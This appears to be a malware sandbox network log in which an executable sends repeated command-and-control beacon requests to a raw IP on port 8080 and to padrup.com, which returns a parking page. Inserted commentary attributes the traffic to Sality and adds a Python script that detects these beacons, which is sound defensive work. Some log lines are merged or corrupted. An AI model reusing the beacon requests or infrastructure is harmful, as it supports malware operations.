Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:16.443428040 CEST | 155 | OUT | GET /sobaka1.gif?7a93601=771179526 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:39:17.525407076 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_TSHdJDoe6UkX0DAnORCM0UErDlExFTps/5R6cihPpuKLYvE6euzMURaNxLZ6qdYOycxdoKs3gVX32CQgp8f60g==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 38 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 8d9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525459051 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE1Ny4xODQ3OjM4ZDU4NWYzMzZhZjU4OGNjNzdkOGEzM2RiNzg4MTRjYjlkMDNhMjE1Y2ZlZTAwNjhiNzIzNTYwMjNkZTlkYzQ6NjcxMjEwYTUyZDE3NQ==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525495052 CEST757INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.7 | 62517 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:17.567866087 CEST | 168 | OUT | GET /sobakavolos.gif?7ca48dd=653487185 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.7 | 62518 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:21.822299004 CEST | 155 | OUT | GET /sobaka1.gif?87df311=569887812 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:39:22.899507046 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_BF8xvDt7Lyf1suO1SiQMp3H1wIvYeZpEZhiu9posc0Z5+P2ygFUdhoLV1cMdKgg2Wy9cnkx5OpRnPvzEEEsMlw==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:39:22.899549007 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE2Mi41NDk1OmRiMzU3NGNjNWJkZjNjYTIwYjE5YWY3MDY5ODk1MTRlOTRlNTQwNDI2ZDYyYTBhY2FlN2YyNmQ3ZjgxMTU4YWM6NjcxMjEwYWE4NjI2OQ==';
Oct 18, 2024 09:39:22.899584055 CEST | 424 | IN | Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 09:39:22.899880886 CEST | 340 | IN | Data Raw: 0d 0a 31 34 36 0d 0a 61 65 33 63 32 38 62 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 146ae3c28b');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 62519 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:22.919814110 CEST | 169 | OUT | GET /sobakavolos.gif?9db5459=1322951368 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache

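The requests in sessions 23 to 26 share one shape: a GET for a .gif under a dog-themed name (sobakavolos.gif, sobaka1.gif) whose query is a single short hex key with a signed integer value, a pre-release User-Agent (MSIE 7.0b on Windows NT 6.0), Cache-Control: no-cache with no Accept header, sent either to a raw IP on port 8080 or to padrup.com. The replies from padrup.com are not command-and-control traffic: Server: nginx together with X-Redirect: skenzo, X-Template and X-Pcrew-Blocked-Reason: hosting network are domain-parking headers, and the body is a parking page whose provider declined to serve ads because the sandbox egress (X-Pcrew-Ip-Organization: QuadraNet) sits in a hosting network. No reply at all is recorded for the 190.120.227.91:8080 sessions. The Python below is an added example, not part of the Joe Sandbox report or the sample, that scores captured requests against those indicators and recognises the parked reply. The sample requests and response are constructed from the ones on this page plus one benign browser request; the 6-to-8 hex-digit key width and the missing-Accept heuristic are assumptions that go beyond what the four requests show.

```python
"""Score captured HTTP requests against the Sality beacon shape seen in this report
and recognise the domain-parking reply that padrup.com returned.

Added example, not code from the report or the sample. The inputs at the bottom are
constructed from the requests and response headers shown on this page."""
import re
from dataclasses import dataclass, field

# Path shape of the beacons on this page, e.g. /sobakavolos.gif?7ca48dd=653487185:
# a .gif name, one short hex key, a signed integer value. The page only shows
# 7-digit keys; accepting 6 to 8 is an assumption.
BEACON_PATH = re.compile(r"^/[a-z0-9]+\.gif\?[0-9a-f]{6,8}=-?\d+$")
# Exact User-Agent the sample sends: a beta MSIE 7 on NT 6.0, which no current
# browser emits.
SALITY_UA = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
RAW_IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
# Headers the parking provider set on every padrup.com reply in the report.
PARKING_HEADERS = ("x-redirect", "x-template", "x-pcrew-blocked-reason", "x-adblock-key")


@dataclass
class HttpMessage:
    start_line: str
    headers: dict = field(default_factory=dict)  # header names lower-cased

    @property
    def path(self) -> str:
        parts = self.start_line.split(" ")
        return parts[1] if len(parts) == 3 and parts[2].startswith("HTTP/") else ""


def parse_message(raw: str) -> HttpMessage:
    """Parse the start line and headers of a request or response; the body is ignored."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln.strip()]
    msg = HttpMessage(start_line=lines[0].strip())
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        msg.headers[name.strip().lower()] = value.strip()
    return msg


def beacon_indicators(req: HttpMessage) -> list:
    """Return the Sality-beacon indicators a request matches; an empty list means clean."""
    hits = []
    if BEACON_PATH.match(req.path):
        hits.append("gif_path_with_random_query")
    if req.headers.get("user-agent") == SALITY_UA:
        hits.append("msie70b_user_agent")
    # Browsers send Accept with image fetches; the sample sends only User-Agent, Host
    # and Cache-Control. Treating that as an indicator is a heuristic (assumption).
    if req.headers.get("cache-control", "").lower() == "no-cache" and "accept" not in req.headers:
        hits.append("no_cache_without_accept")
    if RAW_IP_HOST.match(req.headers.get("host", "")):
        hits.append("raw_ip_host")
    return hits


def is_parked_reply(resp: HttpMessage) -> bool:
    """True when a reply carries at least two of the parking headers seen on padrup.com."""
    return sum(h in resp.headers for h in PARKING_HEADERS) >= 2


def triage(raw_requests) -> list:
    """Return (host, path, indicators) for every request matching two or more indicators."""
    flagged = []
    for raw in raw_requests:
        req = parse_message(raw)
        hits = beacon_indicators(req)
        if len(hits) >= 2:
            flagged.append((req.headers.get("host", ""), req.path, hits))
    return flagged


# Constructed samples: the first two mirror sessions 23 and 26, the third is a benign
# browser fetch added for contrast.
SAMPLE_REQUESTS = [
    "GET /sobakavolos.gif?7ca48dd=653487185 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)\r\n"
    "Host: 190.120.227.91:8080\r\nCache-Control: no-cache\r\n\r\n",
    "GET /sobaka1.gif?f24e375=-2008285411 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)\r\n"
    "Host: padrup.com\r\nCache-Control: no-cache\r\n\r\n",
    "GET /logo.gif?v=3 HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/130.0\r\n"
    "Accept: image/avif,image/webp,*/*\r\n\r\n",
]
# Constructed from the padrup.com reply headers in session 24.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html; charset=UTF-8\r\n"
    "X-Redirect: skenzo\r\nX-Template: tpl_CleanPeppermintBlack_twoclick\r\n"
    "X-Pcrew-Ip-Organization: QuadraNet\r\nX-Pcrew-Blocked-Reason: hosting network\r\n"
    "X-Domain: padrup.com\r\n\r\n<!DOCTYPE html ..."
)

if __name__ == "__main__":
    for host, path, hits in triage(SAMPLE_REQUESTS):
        print(f"{host} {path} -> {', '.join(hits)}")
    print("padrup.com reply is a parking page:", is_parked_reply(parse_message(SAMPLE_RESPONSE)))
```

Run against real captures, the two-indicator threshold in triage keeps a lone no-cache GET from a legitimate client out of the alert queue, while a raw-IP:8080 host plus the MSIE 7.0b string is enough on its own; is_parked_reply is the check that stops an analyst from reporting padrup.com's 200 OK as a live C2 response.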

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 62521 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:39:27.229074955 CEST | 157 | OUT | GET /sobaka1.gif?f24e375=-2008285411 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:39:28.305110931 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_FNPF0dllY67EK+7EzC7HQasHvDZprzLQD2mrCpYqW53q6xXea/+V1xcCPq1538qi44pU8L/PAeeuac/5/mm0fQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 31 66 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1f7<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305144072 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE2Ny45NTUxOmNiNTc2ZDA1M2Y3NzU0MjA0YjZkOGFjZjI5YTQ5MWU3NzMwOTY4NGE1ZGY2YzIyYmY5OTgxOGVjNDAzMzI0ZjI6Njc6e2xMjEwYWZlOTJ
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305160999 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                  Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


Session ID: 27 | Source IP: 192.168.2.7 | Source Port: 62522 | Destination IP: 190.120.227.91 | Destination Port: 8080 | PID: 7272 | Process: C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp: Oct 18, 2024 09:39:28.339416981 CEST | Bytes transferred: 170 | Direction: OUT
GET /sobakavolos.gif?10aef23e=1959305138 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID: 28 | Source IP: 192.168.2.7 | Source Port: 62524 | Destination IP: 185.53.178.50 | Destination Port: 80 | PID: 7272 | Process: C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp: Oct 18, 2024 09:39:32.683916092 CEST | Bytes transferred: 156 | Direction: OUT
GET /sobaka1.gif?158b8302=722929156 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Timestamp: Oct 18, 2024 09:39:33.728588104 CEST | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_AlMf8llvldCGFY2bQOPMXIXNRmgKI6+oyZlVSwl9q6yIpS0Z8Gxul35O68Xt6+pRedcfq+c2i+aXYGbBzhz5SA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Timestamp: Oct 18, 2024 09:39:33.728744984 CEST | Bytes transferred: 1236 | Direction: IN
Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE3My4zOTIzOjlkNDA5ZTg1ZjNiMmM0YzhiZWY2N2Q3ODNlMmY5MzIzYTRlYzQ2N2ZjODA0NjFmMjg2Nzc1YmQwZGU4NmJlMWU6NjcxMjEwYjU1ZmM5MA==';
Timestamp: Oct 18, 2024 09:39:33.728761911 CEST | Bytes transferred: 424 | Direction: IN
Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Timestamp: Oct 18, 2024 09:39:33.728775978 CEST | Bytes transferred: 340 | Direction: IN
Data Raw: 0d 0a 31 34 36 0d 0a 38 30 38 32 38 66 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 14680828fd');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID: 29 | Source IP: 192.168.2.7 | Source Port: 62525 | Destination IP: 190.120.227.91 | Destination Port: 8080 | PID: 7272 | Process: C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp: Oct 18, 2024 09:39:33.750663996 CEST | Bytes transferred: 170 | Direction: OUT
GET /sobakavolos.gif?167a9d17=1508537436 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID: 30 | Source IP: 192.168.2.7 | Source Port: 62526 | Destination IP: 185.53.178.50 | Destination Port: 80 | PID: 7272 | Process: C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp: Oct 18, 2024 09:39:38.152611017 CEST | Bytes transferred: 157 | Direction: OUT
GET /sobaka1.gif?1bfc4aa7=-538815176 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Timestamp: Oct 18, 2024 09:39:39.248230934 CEST | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:39:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_YwUokgUnz0TKJPiB3MyN5xsobouFEmmk0H2oAt9MXBwc8rB5BF34Pp6J2aUd2reHw+pyCoJBi0jcAIQELbVXhA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
